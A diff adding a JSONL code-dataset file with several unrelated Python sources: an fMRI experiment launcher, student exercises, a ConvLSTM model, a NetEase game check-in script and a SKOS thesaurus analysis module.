diff --git "a/5364.jsonl" "b/5364.jsonl" new file mode 100644--- /dev/null +++ "b/5364.jsonl" @@ -0,0 +1,679 @@ +{"seq_id":"580490698","text":"import argparse\nfrom session import PRFSession\n\ndef main(subject, run, reset):\n session = PRFSession(subject_initials=subject,\n index_number=run,\n reset_positions=reset,\n simulate_mri_trigger=True)\n session.run()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"subject\",\n #nargs='?',\n type=str,\n help=\"Subject experiment\")\n parser.add_argument(\"run\",\n type=str,\n default='*',\n help=\"Run experiment\")\n parser.add_argument(\"-r\",\n \"--reset\",\n action='store_true',\n help=\"Whether to reset positiong parameters to default.\")\n args = parser.parse_args()\n main(subject=args.subject,\n run=args.run,\n reset=args.reset)\n","sub_path":"expt/prf.py","file_name":"prf.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"159905796","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport math\ndef maiorDegrau(a):\n maior=0\n for i in range(o,len(a)-1,1):\n degrau= math.fabs(a[i]-a[i+1])\n if degrau>maior:\n maior=degrau\n return maior\n\n\n","sub_path":"moodledata/vpl_data/51/usersdata/97/22468/submittedfiles/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"72664929","text":"import sys\nimport re\ngenes = {}\nid = ''\nseq = ''\nclass invalidseq(Exception):\n\tpass\n\ntry:\n\tfile = sys.argv[1]\n\tprint('fasta provided', file)\n\n\tif not file.endswith('.fa') or not file.endswith('.fasta') or not file.endswith('.nt'):\n\t\traise ValueError('Not a valid file format')\n\n\tfor line in dna:\n\t\tif '>' in line:\n\t\t\tid = (line.strip())\n\t\t\tgenes[id] = seq\n\telse:\n\t\tseq = (line.strip())\n\t\tgenes[id] += seq\n\t\tif re.search('[^ATGCN]+', genes(id)):\n\t\t\traise invalidseq('not found in seq')\nexcept IndexError:\n\tprint('No file given')\nexcept IOError:\n\tprint('Cannot find file')\nexcept ValueError:\n\tprint('Invalid file format')\nexcept invalidseq:\n\tprint('Nucleotides not found in seq')\n","sub_path":"python8/question3final.py","file_name":"question3final.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"383270644","text":"import torch\r\nimport torch.nn as nn\r\nimport math\r\nfrom torch.nn import init\r\n\r\n\r\nclass ConvLSTMCell_LayerNorm(nn.Module):\r\n def __init__(self, input_size, hidden_size, kernel_size, stride,\r\n bias=True, layer_norm=True, elementwise_affine=False, reset=False):\r\n # input_size, hidden_size --> C,H,W\r\n # kernel_size, stride --> int\r\n super(ConvLSTMCell_LayerNorm, self).__init__()\r\n input_dim, input_height, input_width = input_size\r\n hidden_dim, hidden_height, hidden_width = hidden_size\r\n padding = kernel_size // 2\r\n\r\n self.conv = nn.Conv2d(in_channels=input_dim + hidden_dim,\r\n out_channels=4 * hidden_dim,\r\n kernel_size=kernel_size,\r\n stride=stride,\r\n padding=padding,\r\n bias=bias)\r\n if layer_norm is True:\r\n self.LN = nn.LayerNorm(normalized_shape=hidden_size, elementwise_affine=elementwise_affine)\r\n\r\n self.layer_norm = layer_norm\r\n self.hidden_size = hidden_size\r\n self.hidden_dim = hidden_dim\r\n\r\n if reset is True:\r\n self.reset_parameters()\r\n\r\n def forward(self, 
input_tensor, cur_state=None):\r\n # batch_size, channel, height, width\r\n if cur_state is None:\r\n h_cur = input_tensor.new_zeros(input_tensor.shape, requires_grad=False)\r\n c_cur = h_cur\r\n else:\r\n h_cur, c_cur = cur_state\r\n\r\n combined = torch.cat([input_tensor, h_cur], dim=1) # concatenate along channel axis\r\n combined_conv = self.conv(combined)\r\n cc_i, cc_f, cc_o, cc_g = torch.split(combined_conv, self.hidden_dim, dim=1)\r\n\r\n if self.layer_norm is True:\r\n cc_i = self.LN(cc_i)\r\n cc_f = self.LN(cc_f)\r\n cc_o = self.LN(cc_o)\r\n cc_g = self.LN(cc_g)\r\n\r\n i = torch.sigmoid(cc_i)\r\n f = torch.sigmoid(cc_f)\r\n o = torch.sigmoid(cc_o)\r\n g = torch.tanh(cc_g)\r\n\r\n c_next = f * c_cur + i * g\r\n\r\n if self.layer_norm is True:\r\n c_next = self.LN(c_next)\r\n\r\n h_next = o * torch.tanh(c_next)\r\n\r\n return h_next, c_next\r\n\r\n def reset_parameters(self):\r\n stdv = 1.0 / math.sqrt(self.hidden_size[0] * self.hidden_size[1] * self.hidden_size[2])\r\n for weight in self.parameters():\r\n init.uniform_(weight, -stdv, stdv)\r\n\r\n\r\nclass ConvLSTM_LayerNorm(nn.Module):\r\n def __init__(self, input_size, hidden_size, num_layers=1, kernel_size=3, stride=1,\r\n bias=True, layer_norm=True, elementwise_affine=False, reset=False):\r\n super(ConvLSTM_LayerNorm, self).__init__()\r\n\r\n cell_list = []\r\n for i in range(0, num_layers):\r\n cell_list.append(ConvLSTMCell_LayerNorm(input_size=input_size,\r\n hidden_size=hidden_size,\r\n kernel_size=kernel_size,\r\n stride=stride,\r\n bias=bias,\r\n layer_norm=layer_norm,\r\n elementwise_affine=elementwise_affine,\r\n reset=reset))\r\n self.cell_list = nn.ModuleList(cell_list)\r\n self.hidden_size = hidden_size\r\n self.num_layers = num_layers\r\n\r\n def forward(self, input_tensor, hidden_state=None):\r\n # batch_size, seq_len, input_channel, input_height, input_width\r\n\r\n if hidden_state is None:\r\n h_cur = input_tensor.new_zeros(\r\n (input_tensor.size(0), input_tensor.size(2), input_tensor.size(3), input_tensor.size(4)),\r\n requires_grad=False)\r\n c_cur = h_cur\r\n\r\n seq_len = input_tensor.size(1)\r\n cur_layer_input = input_tensor\r\n\r\n for layer_idx in range(self.num_layers):\r\n output_inner = []\r\n h = h_cur\r\n c = c_cur\r\n for t in range(seq_len):\r\n h, c = self.cell_list[layer_idx](input_tensor=cur_layer_input[:, t, :, :, :],\r\n cur_state=(h, c))\r\n output_inner.append(h)\r\n\r\n layer_output = torch.stack(output_inner, dim=1)\r\n cur_layer_input = layer_output\r\n\r\n return cur_layer_input\r\n","sub_path":"ConvLSTM.py","file_name":"ConvLSTM.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"551257750","text":"import requests\nimport json\nfrom getENV import getENv\nfrom checksendNotify import send\n\n\"\"\"\n建议cron: 20 8 * * *\nnew Env('网易云游戏');\n\"\"\"\n\ndef game163(Authorization):\n headers = {\n 'user-agent': 'Mozilla/5.0 (Linux; Android 10; Redmi K30 Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Mobile Safari/537.36',\n ## 下面填抓包来的参数########\n 'Authorization': Authorization\n }\n url = 'http://n.cg.163.com/api/v2/sign-today'\n r = requests.post(url, headers=headers).text\n if r[0] == \"{\":\n return \"cookie已失效\"\n else:\n return \"签到成功\"\n\n\ndef start():\n getENv()\n with open(\"/usr/local/app/script/Shell/check.json\", \"r\", encoding=\"utf-8\") as f:\n datas = json.loads(f.read())\n _check_item = datas.get(\"163game\", [])\n res = 
game163(_check_item.get('Authorization'))\n print(res)\n send(\"网易云游戏\", res)\n\nif __name__ == \"__main__\":\n start()","sub_path":"ck_163game.py","file_name":"ck_163game.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70128539","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nAnalyze thesauri\r\n\r\nScript with functions to analyze a thesaurus.\r\n\"\"\"\r\n\r\n__author__ = \"Quinten van Langen\"\r\n__version__ = \"1.0.0\"\r\n__license__ = \"cc0-1.0\"\r\n\r\n\r\nimport pickle\r\nimport xml.etree.ElementTree as ET\r\nimport pandas as pd\r\nimport os\r\nfrom datetime import datetime\r\nimport random\r\nfrom sets import Set\r\nimport re\r\nfrom anytree import Node\r\n\r\ndef time(start):\r\n return datetime.now() - start\r\n\r\ndef find_matches(dict1): # Create a list and dictionary of stored matches\r\n matches_dict = {}\r\n AAT_match_list = []\r\n Dutch_AAT_match_list = []\r\n misplaced_AAT_list = []\r\n\r\n for concept in dict1:\r\n matches = dict1[concept]['matches']\r\n for match in matches:\r\n if 'aat' in match:\r\n if 'vocab.getty.edu' in match:\r\n match = re.findall(r'\\b\\d+\\b', match)[-1]\r\n matches_dict[match] = concept\r\n AAT_match_list.append(match)\r\n elif 'browser.aat-ned' in match:\r\n matches_dict[match] = concept\r\n Dutch_AAT_match_list.append(match)\r\n else:\r\n misplaced_AAT_list.append(match)\r\n AAT_match_list = list(set(AAT_match_list))\r\n print('{} Created lists and dictionary of AAT matches'\r\n .format(time(start)))\r\n return matches_dict, AAT_match_list, Dutch_AAT_match_list, misplaced_AAT_list\r\n \r\ndef match_in_AAT(AAT_dict, AAT_match_list): # Check if a match is present in the AAT dictionary\r\n matches_in_aat_dict = {}\r\n matches_in_aat_list = []\r\n for concept in AAT_dict:\r\n the_id = str(AAT_dict[concept]['id'])\r\n if the_id in AAT_match_list:\r\n matches_in_aat_dict[concept] = the_id\r\n matches_in_aat_list.append(the_id)\r\n\r\n matches_in_aat_list = list(set(matches_in_aat_list))\r\n print('{} Searched for the matches in AAT'\r\n .format(time(start)))\r\n return matches_in_aat_list, matches_in_aat_dict\r\n\r\ndef matches_not_in_parse(match_dict, match_list1, match_list2, RT_dict): # determine the amount of matches that are not parsed from the AAT\r\n difference_list = list(set(match_list1) - set(match_list2))\r\n missing_aat_list = []\r\n for difference in difference_list:\r\n missing_aat_list.append(RT_dict[match_dict[difference]])\r\n return missing_aat_list\r\n\r\ndef own_overlap(thesaurus_dict): #Look at the overlap in labels within a thesaurus\r\n copy_dict = dict(thesaurus_dict)\r\n the_own_overlap_dict = {}\r\n label_list = []\r\n\r\n for concept1 in thesaurus_dict:\r\n labels_concept1 = thesaurus_dict[concept1]['prefLabel'] + thesaurus_dict[concept1]['altLabel']\r\n concept1 = re.findall(r'\\b\\d+\\b', concept1)[-1]\r\n for a_label in labels_concept1:\r\n for concept2 in copy_dict:\r\n labels_concept2 = copy_dict[concept2]['prefLabel'] + copy_dict[concept2]['altLabel']\r\n concept2 = re.findall(r'\\b\\d+\\b', concept2)[-1] \r\n if a_label in labels_concept2:\r\n combination_list = [concept2, a_label]\r\n combination_list2 = [concept1, a_label]\r\n if combination_list == combination_list2:\r\n continue\r\n if a_label not in label_list:\r\n if concept2 in the_own_overlap_dict and combination_list2 in the_own_overlap_dict[concept2]:\r\n continue\r\n else:\r\n if concept1 not in the_own_overlap_dict:\r\n 
the_own_overlap_dict[concept1] = [combination_list]\r\n elif combination_list not in the_own_overlap_dict[concept1]:\r\n the_own_overlap_dict[concept1].append(combination_list)\r\n label_list.append(a_label)\r\n the_own_overlap_list = restructure_dict_to_list(the_own_overlap_dict)\r\n return the_own_overlap_dict\r\n\r\ndef store_dict(dict, picklefile): # Store a Python dictionary in a pickle file\r\n output = open(picklefile, 'wb')\r\n pickle.dump(dict, output)\r\n output.close()\r\n\r\ndef restructure_dict_to_list(dict): # Restructures the own overlap dictionary to a list\r\n return_list = []\r\n for overlap in dict:\r\n for a_list in dict[overlap]:\r\n new_list = [overlap] + a_list\r\n return_list.append(new_list)\r\n return return_list\r\n\r\ndef find_overlap(full_dict1, full_dict2): # Search for all overlapping concepts based on the labels\r\n overlap_dict = {}\r\n for concept1 in full_dict1:\r\n concept1_labels = full_dict1[concept1]['prefLabel'] + full_dict1[concept1]['altLabel']\r\n for a_label in concept1_labels:\r\n for concept2 in full_dict2:\r\n concept2_labels = full_dict2[concept2]['prefLabel'] + full_dict2[concept2]['altLabel']\r\n if a_label in concept2_labels:\r\n concept1_matches = full_dict1[concept1]['matches']\r\n if concept1 in overlap_dict:\r\n overlap_dict[concept1].append(a_label)\r\n else:\r\n overlap_dict[concept1] = [concept2, concept1_matches, a_label]\r\n\r\n store_dict(overlap_dict, 'overlap_dict2.pkl')\r\n print('{} Finished looking at overlap and stored the overlapping concepts in a dictionary'\r\n .format(time(start)))\r\n return overlap_dict\r\n\r\ndef matched_overlap(overlap_dict, match_dict): # Look at the amount of overlapping concepts that have a match stored as url\r\n count = 0\r\n stored_match_types = {}\r\n overlap_list = []\r\n for overlap in overlap_dict:\r\n list_of_labels = create_list_of_labels(overlap_dict[overlap])\r\n the_id = re.findall(r'\\b\\d+\\b', overlap)[-1]\r\n overlap_list.append([the_id] + list_of_labels)\r\n if the_id in match_dict:\r\n concept1 = overlap_dict[overlap][0]\r\n concept_types = full_RT[concept1]['schemes']\r\n for a_type in concept_types:\r\n if a_type not in stored_match_types:\r\n stored_match_types[a_type] = 1\r\n else:\r\n stored_match_types[a_type] += 1\r\n count += 1\r\n print('{} {} of the {} overlapping concepts are already matched'\r\n .format(time(start), count, len(overlap_dict)))\r\n matched_overlap_count = count\r\n return matched_overlap_count, stored_match_types, overlap_list\r\n\r\ndef create_list_of_labels(dict_list): # creates a list of labels from the list made for the overlap dictionary\r\n return_list = []\r\n label_list = []\r\n for item in dict_list:\r\n if dict_list.index(item) > 1:\r\n label_list.append(item)\r\n else:\r\n return_list.append(item)\r\n return_list.append(label_list)\r\n return return_list\r\n\r\ndef find_type_of_overlap(overlap_dict, full_dict): # Look at the types and their amounts of the overlap concepts\r\n overlap_types = {}\r\n for overlap in overlap_dict:\r\n the_concept = overlap_dict[overlap][0]\r\n the_types = full_dict[the_concept]['schemes']\r\n for a_type in the_types:\r\n if a_type not in overlap_types:\r\n overlap_types[a_type] = 1\r\n else:\r\n overlap_types[a_type] += 1\r\n return overlap_types\r\n\r\ndef write_to_xlsxfile(values, filename, sheet_name, headers):\r\n writer = pd.ExcelWriter(filename, engine='xlsxwriter')\r\n if type(values) == dict:\r\n if headers == []:\r\n the_dataframe = pd.DataFrame.from_dict(values, orient='index')\r\n else:\r\n the_dataframe = 
pd.DataFrame.from_dict(values, orient='index', columns=headers)\r\n elif type(values) == list:\r\n if headers == []:\r\n the_dataframe = pd.DataFrame(values)\r\n else:\r\n the_dataframe = pd.DataFrame(values, columns=headers)\r\n else:\r\n return None\r\n the_dataframe.to_excel(writer, sheet_name=sheet_name)\r\n writer.close()\r\n\r\ndef load_dictionaries(): # Load pickle dictionaries\r\n\r\n start = datetime.now()\r\n os.chdir('out')\r\n # Load the Rijksmuseum thesaurus, AAT and overlap dictionaries\r\n full_RT = pickle.load( open( \"full2_dictionary.pkl\", \"rb\" ) )\r\n print('{} Loaded the Rijksmuseum dictionary'\r\n .format(time(start)))\r\n\r\n full_AAT = pickle.load(open('AAT/AAT_full_dictionary.pkl', 'rb'))\r\n print('{} Loaded the AAT dictionary'\r\n .format(time(start)))\r\n\r\n overlap_dict = pickle.load(open('overlap_dict.pkl', 'rb'))\r\n print('{} Loaded the overlap dictionary'\r\n .format(time(start)))\r\n\r\n full_own = pickle.load( open( \"own_overlap_dict.pkl\", \"rb\" ) )\r\n print('{} Loaded the own Rijksmuseum overlap dictionary with a length of {}'\r\n .format(time(start), len(full_own)))\r\n\r\n full_own_AAT = pickle.load( open( \"shorten_own_overlap_dict_AAT.pkl\", \"rb\" ) )\r\n print('{} Loaded the own overlap AAT dictionary with a length of {}'\r\n .format(time(start), len(full_own_AAT)))\r\n\r\n return full_RT, full_AAT, overlap_dict, full_own, full_own_AAT\r\n\r\ndef list_concepts(dom):\r\n # Create a list with the id's of the SKOS concepts\r\n concept_identifiers = []\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n concept_id = node.attributes.items()[0][1]\r\n concept_identifiers.append(concept_id)\r\n return concept_identifiers\r\n\r\n\r\ndef referenced_concept_schemes(dom):\r\n # List all concept schemes referenced in the thesaurus\r\n concept_schemes = []\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName == 'skos:inScheme'):\r\n concept_scheme = property.attributes.items()[0][1]\r\n if concept_scheme not in concept_schemes:\r\n concept_schemes.append(concept_scheme)\r\n return concept_schemes\r\n\r\n\r\ndef list_schemeless_concepts(dom):\r\n # List all concepts that do not reference a concept scheme\r\n schemeless_concepts = []\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n concept_id = node.attributes.items()[0][1]\r\n in_scheme = False\r\n\r\n for property in node.childNodes:\r\n if property.nodeName == 'skos:inScheme':\r\n in_scheme = True\r\n if not in_scheme:\r\n schemeless_concepts.append(concept_id)\r\n return schemeless_concepts\r\n\r\n\r\ndef create_inverse_hierarchy(dom):\r\n # The inverse of every hierarchical skos relation is added to a dictionary:\r\n # {'http://concept.net/2': {'skos:broader': ['http://concept.net/1']}}\r\n hierarchy_dict = {}\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and (property.nodeName in hierarchy_labels)):\r\n concept_id = node.attributes.items()[0][1]\r\n prop_name = property.nodeName\r\n prop_inv = inverse_property(prop_name)\r\n object_id = property.attributes.items()[0][1]\r\n\r\n if object_id not in hierarchy_dict:\r\n 
hierarchy_dict[object_id] = {}\r\n hierarchy_dict[object_id][prop_inv] = [concept_id]\r\n elif prop_inv not in hierarchy_dict[object_id]:\r\n hierarchy_dict[object_id][prop_inv] = [concept_id]\r\n else:\r\n hierarchy_dict[object_id][prop_inv].append(concept_id)\r\n return hierarchy_dict\r\n\r\n\r\n\r\ndef inverse_property(property_name):\r\n if property_name == 'skos:broader':\r\n return 'skos:narrower'\r\n elif property_name == 'skos:narrower':\r\n return 'skos:broader'\r\n else:\r\n return 'skos:related'\r\n\r\n\r\ndef missing_outward_references(dom):\r\n inverse_hierarchy = create_inverse_hierarchy(dom)\r\n missing_references = []\r\n\r\n # Iterate through all concepts in inverse_hierarchy to check whether\r\n # all deduced references are present for the concept in question\r\n for concept_id in inverse_hierarchy:\r\n concept = get_concept(dom, concept_id)\r\n if concept is not None:\r\n properties = hierarchical_properties_dict(concept, 'no')\r\n i_properties = inverse_hierarchy[concept_id]\r\n missing = outward_difference(concept_id, properties, i_properties)\r\n if missing != []:\r\n missing_references.append(missing)\r\n return missing_references\r\n\r\n\r\ndef outward_difference(concept_id, props, i_props):\r\n missing_references = []\r\n\r\n for h_label in i_props:\r\n if h_label in i_props and h_label in props:\r\n diff = list(set(i_props[h_label]) - set(props[h_label]))\r\n else:\r\n diff = i_props[h_label]\r\n if diff != []:\r\n missing = [concept_id, h_label, diff]\r\n missing_references.append(missing)\r\n return missing_references\r\n \r\n\r\ndef get_concept(dom, concept_id):\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n if concept_id == node.attributes.items()[0][1]:\r\n return node\r\n return None\r\n\r\ndef get_concept_scheme(dom, scheme):\r\n root = dom.childNodes.item(0)\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:ConceptScheme'):\r\n if scheme == node.attributes.items()[0][1]:\r\n return node\r\n return None\r\n\r\n\r\ndef get_relation_property(concept, property, attribute):\r\n for node in concept.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == property \r\n and node.attributes.items()[0][1] == attribute):\r\n return node\r\n return None\r\n\r\n\r\ndef undefined_concept_references(dom):\r\n missing_references = []\r\n concepts = list_concepts(dom)\r\n root = dom.childNodes.item(0)\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n\r\n # Iterate through all concepts to check if they include references\r\n # to concepts that do not exist\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n concept_id = node.attributes.items()[0][1]\r\n\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in hierarchy_labels):\r\n object_id = property.attributes.items()[0][1]\r\n h_label = property.nodeName\r\n if object_id not in concepts:\r\n missing = [concept_id, h_label, object_id]\r\n missing_references.append(missing)\r\n return missing_references\r\n\r\n\r\ndef hierarchical_properties_dict(node, extra):\r\n # Each hierarchical property is stored in a dictionary with the name of the\r\n # property and its value.\r\n hierarchical_properties = {}\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 
'skos:related']\r\n\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in hierarchy_labels):\r\n prop_name = property.nodeName\r\n if extra == 'yes':\r\n object_id = re.findall(r'\\b\\d+\\b', property.attributes.items()[0][1])[-1]\r\n else:\r\n object_id = property.attributes.items()[0][1]\r\n if prop_name in hierarchical_properties:\r\n hierarchical_properties[prop_name].append(object_id)\r\n else:\r\n hierarchical_properties[prop_name] = [object_id]\r\n return hierarchical_properties\r\n\r\ndef label_properties_dict(node):\r\n # Each label is stored in a dictionary with the label itself and it's language\r\n label_properties = {}\r\n label_labels = ['skos:prefLabel', 'skos:altLabel']\r\n label_properties['prefLabel'] = []\r\n label_properties['altLabel'] = []\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in label_labels):\r\n property_dict = {}\r\n prop_name = property.nodeName[5:]\r\n language = str(property.attributes.items()[0][1])\r\n label = str(property.childNodes[0].data.encode('utf-8'))\r\n property_dict['language'] = language\r\n property_dict['label'] = label\r\n label_properties[prop_name].append(property_dict)\r\n return label_properties\r\n\r\ndef extra_properties_dict(node):\r\n # Some extra properties for a concept are stored in a dictionary\r\n extra_properties_dict = {}\r\n extra_labels = ['skos:scopeNote', 'skos:exactMatch', 'skos:topConceptOf']\r\n create_labels = ['notes', 'matches']\r\n for label in create_labels:\r\n extra_properties_dict[label] = []\r\n topConcept_count = 0\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in extra_labels):\r\n prop_name = property.nodeName[5:]\r\n if prop_name == 'scopeNote':\r\n the_note = str(property.childNodes[0].data.encode('utf-8'))\r\n extra_properties_dict['notes'].append(the_note)\r\n elif prop_name == 'topConceptOf':\r\n topConcept_count += 1\r\n elif prop_name == 'exactMatch':\r\n match = property.attributes.items()[0][1]\r\n extra_properties_dict['matches'].append(match)\r\n extra_properties_dict['#Top concepts'] = topConcept_count\r\n return extra_properties_dict\r\n\r\ndef restructure_missing_references(a_list):\r\n # Restructures the list of missing references\r\n return_list = []\r\n for i in a_list:\r\n for j in i:\r\n another_list = j[-1]\r\n j.pop()\r\n for the in another_list:\r\n copy_j = list(j)\r\n copy_j.append(str(the))\r\n return_list.append(copy_j)\r\n return return_list\r\n\r\ndef find_top_concepts(dom):\r\n # Create a list of concepts without broader concepts\r\n root = dom.childNodes.item(0)\r\n list_of_top_concepts = []\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n hierarchical_properties = hierarchical_properties_dict(node, 'no')\r\n concept_id = node.attributes.items()[0][1]\r\n if 'skos:broader' not in hierarchical_properties:\r\n list_of_top_concepts.append(concept_id)\r\n return list_of_top_concepts\r\n\r\ndef find_all_schemes(dom, extra):\r\n # Create a dictionary which stores all schemes of a concept\r\n schemes_dict = {}\r\n root = dom.childNodes.item(0)\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n if extra == 'yes':\r\n concept_id = re.findall(r'\\b\\d+\\b', node.attributes.items()[0][1])[-1]\r\n else:\r\n concept_id = 
node.attributes.items()[0][1]\r\n schemes_dict[concept_id] = []\r\n for property in node.childNodes:\r\n if property.nodeName == 'skos:inScheme':\r\n if extra == 'yes':\r\n scheme_label = property.attributes.items()[0][1][42:]\r\n else:\r\n scheme_label = property.attributes.items()[0][1]\r\n schemes_dict[concept_id].append(scheme_label)\r\n return schemes_dict\r\n\r\ndef all_properties(dom, extra):\r\n # Create a list of all relevant properties for each concept\r\n all_properties_dict = {}\r\n schemes_dict = find_all_schemes(dom, 'yes')\r\n root = dom.childNodes.item(0)\r\n for concept in root.childNodes:\r\n if (concept.nodeType == concept.ELEMENT_NODE\r\n and concept.nodeName == 'skos:Concept'):\r\n concept_id = re.findall(r'\\b\\d+\\b', concept.attributes.items()[0][1])[-1]\r\n all_properties_dict[concept_id] = {}\r\n all_properties_dict[concept_id][\"id\"] = concept_id\r\n all_properties_dict[concept_id].update(hierarchical_properties_dict(concept, 'yes'))\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n for label in hierarchy_labels:\r\n if label not in all_properties_dict[concept_id]:\r\n all_properties_dict[concept_id][label] = []\r\n all_properties_dict[concept_id].update(label_properties_dict(concept))\r\n if extra == 'yes':\r\n all_properties_dict[concept_id]['schemes'] = schemes_dict[concept_id]\r\n all_properties_dict[concept_id].update(extra_properties_dict(concept))\r\n all_properites_dict = determine_depth(all_properties_dict)\r\n\r\n all_properties_list = []\r\n for a_concept in all_properties_dict:\r\n all_properties_list.append(all_properties_dict[a_concept])\r\n return all_properties_list\r\n\r\n\r\n\r\ndef determine_depth(concept_dict):\r\n # Determining the depth of each concept in the hierarchical tree\r\n list_of_tuples = []\r\n node_dict = {}\r\n for concept in concept_dict:\r\n concept_id = concept_dict[concept]['id']\r\n node_dict[concept_id] = Node(str(concept_id))\r\n broader = concept_dict[concept]['skos:broader']\r\n if broader == []:\r\n continue\r\n for b in broader:\r\n new_tuple = (concept_id, b)\r\n if new_tuple not in list_of_tuples:\r\n list_of_tuples.append(new_tuple)\r\n for j in list_of_tuples:\r\n child = j[0]\r\n parent = j[1]\r\n if child == parent:\r\n continue\r\n if child in concept_dict and parent in concept_dict:\r\n node_dict[child].parent = node_dict[parent]\r\n for concept in concept_dict:\r\n depth = int(len(node_dict[concept_dict[concept]['id']].path) - 1)\r\n concept_dict[concept]['Depth'] = depth\r\n return concept_dict\r\n\r\ndef reference_analyse(list):\r\n # Perform quantitative analysis of the reference properties\r\n references_dict = {}\r\n total_broader = {}\r\n total_narrower = {}\r\n total_related = {}\r\n for concept in list:\r\n broader = concept['skos:broader']\r\n narrower = concept['skos:narrower']\r\n related = concept['skos:related']\r\n number_broader = len(broader)\r\n number_narrower = len(narrower)\r\n number_related = len(related)\r\n references_dict[concept['id']] = [number_broader, number_narrower, number_related]\r\n total = number_broader + number_narrower + number_related\r\n if number_broader in total_broader:\r\n total_broader[number_broader] += 1\r\n else:\r\n total_broader[number_broader] = 1\r\n if number_narrower in total_narrower:\r\n total_narrower[number_narrower] += 1\r\n else:\r\n total_narrower[number_narrower] = 1\r\n if number_related in total_related:\r\n total_related[number_related] += 1\r\n else:\r\n total_related[number_related] = 1\r\n return_list = 
[total_broader, total_narrower, total_related]\r\n reference_dict = create_reference_dict(references_dict)\r\n return reference_dict, return_list\r\n\r\ndef create_reference_dict(dict):\r\n # Create a type of dictionary about all references of a concept\r\n reference_dict = {}\r\n for concept in dict:\r\n references = dict[concept]\r\n string_references = \"\"\r\n for i in references:\r\n string_references += str(i)\r\n string_references += '-'\r\n string_references = ''.join(string_references.split())[:-1].upper()\r\n if string_references in reference_dict:\r\n reference_dict[string_references] += 1\r\n else:\r\n reference_dict[string_references] = 1\r\n return reference_dict\r\n\r\ndef label_analyse(list):\r\n # Perform a quantitative analysis on the labels of a concept\r\n concept_label_dict = {}\r\n count_label_dict = {}\r\n language_label_dict = {}\r\n count_label_dict ['pref'] = {}\r\n count_label_dict ['alt'] = {}\r\n language_label_dict ['pref'] = {}\r\n language_label_dict ['alt'] = {}\r\n for concept in list:\r\n concept_id = concept['id']\r\n label_dict = {}\r\n pref = concept['prefLabel']\r\n alt = concept['altLabel']\r\n label_dict['pref'] = pref\r\n label_dict['alt'] = alt\r\n if len(pref) in count_label_dict ['pref']:\r\n count_label_dict ['pref'][len(pref)] += 1\r\n else:\r\n count_label_dict ['pref'][len(pref)] = 1\r\n if len(alt) in count_label_dict ['alt']:\r\n count_label_dict ['alt'][len(alt)] += 1\r\n else:\r\n count_label_dict ['alt'][len(alt)] = 1\r\n label_dict['#pref'] = len(pref)\r\n label_dict['#alt'] = len(alt)\r\n pref_language_list = []\r\n for i in pref:\r\n language = i['language']\r\n pref_language_list.append(language)\r\n language_label_dict ['pref'][language] = language_label_dict ['pref'].get(language, 0) + 1\r\n label_dict['Pref languages'] = pref_language_list\r\n alt_language_list = []\r\n for i in alt:\r\n language = i['language']\r\n alt_language_list.append(language)\r\n language_label_dict ['alt'][language] = language_label_dict ['alt'].get(language, 0) + 1\r\n label_dict['Alt languages'] = alt_language_list\r\n concept_label_dict[concept['id']] = label_dict\r\n return concept_label_dict, language_label_dict, count_label_dict\r\n\r\ndef is_number(s):\r\n # Check if a string is a number\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False \r\n\r\ndef matches_analyse(list):\r\n # Perform a quantitative \r\n key_list = ['none', 'AAT', 'TGN', 'MIMO', 'Wiki', 'Numbers', 'Geonames', 'other']\r\n number_matches_dict = {}\r\n for key in key_list:\r\n number_matches_dict[key] = 0\r\n for concept in list:\r\n if len(concept['matches']) == 0:\r\n number_matches_dict['none'] += 1\r\n 